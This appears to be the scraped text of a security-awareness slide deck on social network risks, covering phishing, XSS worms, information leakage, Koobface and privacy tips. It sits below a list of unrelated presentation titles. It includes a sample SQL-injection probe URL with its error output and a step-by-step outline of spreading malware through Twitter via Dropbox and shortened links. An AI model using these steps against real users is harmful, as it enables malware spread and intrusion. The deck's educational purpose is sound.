GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 

Social networks security risks

  • 1. SECURITY & 1 PRIVACY ON SOCIAL NETWORKS Omar M Alsuhaibany CISSP, GCFA, ISO 27001 LA
  • 2. It’s not only about Facebook :) 2
  • 3. Before Social Networks 3 Social Networks
  • 4. A Social Networks definition 4  Defines itself  on Wiki: A social network is a social structure made up of individuals (or organizations) called "nodes", which are tied (connected) by one or more specific types of interdependency, such as friendship, kinship, common interest, financial exchange, dislike, or relationships of beliefs, knowledge or prestige.
  • 5. Examples of Social Networks? 5  Facebook  LinkedIn  Twitter Even more media:  RSS Feeds  Blogs  Wikis  Web Chat  Podcasts  Mashups  Photo/Video-sharing  Virtual Worlds
  • 6. Common Web 2.0 6 Vulnerabilities  Phishing  Spam  Malwares  Cross Site Scripting  SQL Injection  Authentication and Authorization Flaws  Information Leakage  Insecure Storage  Insecure Communications
  • 7. Some Web 2.0 Specific 7 Vulnerabilities  On top of that list we do have some specific Web 2.0 vulnerabilities:  XSS Worms  Feed Injections  Mashup and Widget Hacks
  • 8. Well First thing first: 8 Passwords!!!  Is it new thing? No, however its different.  Password sloth. Using the same password on several sites is like trusting the weakest link in a chain to carry the same weight.  Use same password as your email when the login username is your email!!  According to FB stats. More than 50% use the same password.  Avoid using the same password on multiple sites  Do not synchronize account information with organization login credentials.
  • 10. Phishing 10 cont’d
  • 11. Phishing 11 cont’d  Major phishing attempts  Simple "look at this" message  Users directed to fbstarter.com, fbaction.net  Phished credentials used to automatically log in, send more mail  Some users report passwords changed  Phishtank reports Facebook 7th most common target  Behind only banks, PayPal eBay  "Socail Phishing" is far more effective
  • 12. Phishing 12 cont’d  72% successful in controlled study  No TLS for login page  No Anti-phishing measures  Frequent genuine emails with login links  Users don't consider social networks' passwords as valuable  Web 2.0 sites encourage password sharing…  Facebook is doing a good job but still!
  • 13. Phishing 13 cont’d
  • 14. Phishing 14 cont’d
  • 15. Spam 15  Spam is not only for spamming purposes! Although annoying.  All new types: followers, friend requests, fake accounts
  • 16. Spam 16 cont’d  Fighting the Spam  Automatically detect spammer profiles:  analyze link history  analyze graph structure  analyze profile  Aggressivelyrequest CAPTCHAs  Users feedback  Classifiers  Stringblocking  Hashing  Machine Learning
  • 17. Cross Site Scripting (XSS) 17  New to Web 2.0? No  Is this worse in Web 2.0? Yes  XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content.
  • 18. XSS Worms 18  New to Web 2.0? Yes  Self propagating XSS code injected into a web application which will spread when users visits a page.  First XSS worm, 4 years ago spread through MySpace  1 million+ infections in 24 hours
  • 19. Feed Injections 19  New to Web 2.0? Yes  Feed aggregators have data coming from various untrusted sources. The data being received can be malicious and exploit users.  Remote Zone Risks  Web browsers or web based readers in this category  Attacks such as XSS and CSRF possible
  • 20. Mashup and Widget 20  New to Web 2.0? Yes Mashups and Widgets are core components in Web 2.0 sites. The rich functionality they provide can be exploited by attackers through attacks such as XSS.
  • 21. Mashup and Widget 21 cont’d  Mashups site is the middleman, do you trust it?  Multiple inputs, one output  Mashup communications could leak data  Mashups require cross domain access.
  • 23. Information Leakage 23  New to Web 2.0? No  Is this worse in Web 2.0? Yes Applications can unintentionally leak information about their configuration, internal workings, or violate privacy through a variety of application problems.
  • 24. Information Leakage 24 cont’d  A simple lack of error handling leaking information  http://www.examplesite.com/home.html?day=Mon dayDrivers(0x80040E14)  I add a little something onto the URL  http://www.examplesite.com/home.html?day=Mon day AND userscolumn=2  No error handling = information leakage Microsoft OLE DB Provider for ODBC Drivers(0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]Invalid column name/examplesite/login.asp, line 10
  • 25. Information Leakage 25 cont’d  What makes this worse in Web 2.0?  Business logic and validation moved to the client side  Web 2.0 apps will do a lot of work on the client side  Validation of data, business logic and sensitive data  You need to back these up with server side checks  Never assume sensitive data will be safe client
  • 26. Authentication and Authorization Flaws 26  New to Web 2.0? No  Is this worse in Web 2.0? Yes These flaws can lead to the hijacking of user or accounts, privilege escalation, undermine authorization and accountability controls, and cause privacy violations.
  • 27. Authentication and Authorization Flaws 27 cont’d  Authentication and Authorization Weaknesses  Passwords with no max age, reasonable lengths and complexity  Lack of brute force protection  Broken CAPTCHA systems  Security through obscurity  Session Management Weaknesses  Lack of sufficient entropy in session ID’s  Predictable session ID’s  Lack of sufficient timeouts and maximum lifetimes for ID’s  Using one session ID for the whole session
  • 28. Authentication and Authorization Flaws 28 cont’d  What makes this worse in Web 2.0?  CAPTCHA’s used to provide strong A+A but are often weak  More access points in Web 2.0 applications  The use of single sign on leads to single point of failure  Growth in other attacks further undermines A+A
  • 29. Insecure Storage and Communications 29  New to Web 2.0? No  Is this worse in Web 2.0? Yes These flaws could allow sensitive data to be stolen if the appropriate strong protections aren’t in place.
  • 30. Insecure Storage and Communications 30 cont’d  Insecure storage of data  Not encrypting sensitive data  Hard coding of keys and/or insecurely storing keys  Using broken protection mechanisms (i.e. DES)  Failing to rotate and manage encryption keys  Insecure communications  Not encrypting sensitive data in transit  Only using SSL/TLS for the initial logon request  Failing to protect keys whilst in transit  Emailing clear text passwords
  • 31. Insecure Storage and Communications 31 cont’d  What makes this worse in Web 2.0?  More data in more places, including client side storage  Mixing secure and insecure content on a page  And now with the Cloud!!!
  • 32. Browsing Habits and Experience 32 have Changed…  Trigger finger (clicking on everything). Inboxes contain everything from drink requests to cause requests, do not get into the click habit unless you are ready to deal with drive-by downloads and zero-day attacks.
  • 33. A little on Privacy … 33  3rd Party Apps on Facebook  Anyone can create a Facebook app  Many of the agreement you must accept gives the company the right to monitor your data and sell it without informing you.  Tracker information can be built into any application.  Mixing personal with professional; Commonly on Facebook, where one’s friends included business associates, family members and friends.  Engaging in Tweet (or Facebook/LinkedIn/Myspace) rage. Imagine you are at a party where everyone is listening, including your boss, spouse and future employer.
  • 34. Privacy 34 cont’d
  • 35. Privacy 35 cont’d
  • 36. Data = $$$ 36  Steal your money directly  Sell your data  Trick your friends and family into supplying personal data  Sell your identity  Use your accounts to spread spam, malware and more data theft scams  Sell your organization's data or sensitive information  Blackmail individuals and organizations
  • 37. URL Shortners Risks 37  bit.ly, hex.io, zi.ma …etc  Where the URL will take you?  dubious link via email? Hover your mouse or check the HTML  A new way for email Phishing scams  DDOS with iframe  Easily escaping spam filters  Even more dangerous! what if the site got hacked?  “See before you click” functionality or extensions  Example: j.mp
  • 38. Malware example: Koobface 38  The Koobface worm and its associated botnet have gained notoriety in security circles for its longevity and history of targeting social networking sites. First surfacing in 2008 within MySpace and Facebook, the worm resurfaced in early 2009, this time targeting Twitter users.  By using Phishing techniques, the message directs the recipients to a third- party website, where they are prompted to download what is purported to be an update of the Adobe Flash player.  11/10/2009 - As part of a new Koobface attack, links to Google Reader URLs controlled by cyber-criminals are being spammed by Koobface onto social network sites, including Facebook and MySpace. The hundreds of Google accounts involved host a page with a fake YouTube video. Attempts to view this supposed video expose Windows users to infection by Koobface.  Koobface ultimately attempts, upon successful infection, to gather sensitive information from the victims such as credit card numbers.
  • 39. Facebook Widget Installing 39 Spyware  Prompts users to install the infamous "Zango" adware/spyware.
  • 40. Twitter hacking example: 40  Select victim group using any one of a number of Twitter trend tools.  Select malware based on device or location info.  Upload malware to dropbox.com and request a public link for the uploaded file.  Use a URL shortening service to obfuscate the URL.  Send tweet to target referencing information or post with keywords so that all individuals “tracking” the keywords will be notified of a new tweet on the subject they are tracking.
  • 41. Scareware Tweets 41  Scareware is fake anti-virus – instead of protecting your computer it infects it  Scammers create multiple tweets that direct you to a scareware page. They then try to frighten you into believing you have a security problem and need their software to address it  Other scareware attacks aim to:  Take control of your computer to send spam  Hold your computer to ransom  Result: Malware infection
  • 42. Security analysis difficulties 42 with Web 2.0  More code and complexity in Web 2.0 apps  At least two languages to analyze (client and server)  User supplied code might never be reviewed  Dynamic nature increases risk of missing flaws  Increased amount of input points
  • 43. Basics of Social Networking 43 Security  Never Post Personal Information Online  Everything you post is public information  If you don’t feel comfortable with everyone seeing it, then don’t put it online  Configure security settings on all sites  Most websites you log into have security configurations  Set the privacy levels in accordance to what you are posting  Change your Password Regularly  Use Phrases, not words  Do not keep a “Master” password  Never Trust E-mails asking for personal information  An official organization will never ask you to disclose any private information in order to correct a error
  • 44. Basics of Social Networking Security 44 cont’d  Do not friend anyone you do not know and trust  Hackers and spammers are more clever then you think. There is a reason many online scams are called “Social engineering”  Clean out your friend list regularly  Watch For Hacked Friend Accounts  Unusual posts or requests  Posting “Shock Sites”  Beware of Third Party Apps  Many require you to sign a agreement giving them the right to sell your information  Malicious code can be written in the program  Delete unused Apps  If you are not using them, then why let them potentially mine data about you?  If you are unsure a app or a post or anything, then Google is your best friend
  • 45. Basics of Social Networking Security 45 cont’d  Caution about posting your location online  People are watching you where you will be and more importantly where you will not be  Check your security settings monthly  Facebook sets all profiles to public with each site redesign  Apps may disable your security settings  Viruses and Malware may disable your security settings  Consider using Private Browsing  Private Browsing allows you to view websites without storing your history or installing cookies  Private Browsing Shortcuts:  Firefox – Ctrl + Shift + P  Internet Explore 8 – Ctrl + Shift + P  Opera – Ctrl + Shift + N  Google Chrome – Ctrl+Shift+N  Don’t stay logged on
  • 46. Basics of Social Networking Security 46 cont’d  Set your settings to high privacy and/or enable security settings on the sites you use.  Review a given Website’s privacy policy, you may be surprised on what you are actually agreeing to.  Log off when you leave.  Install and update antivirus software.  Keep system software AND applications up to date.  Make sure the connection you use is secure.
  • 47. ? ? ? ? ? ? ? ? ? ?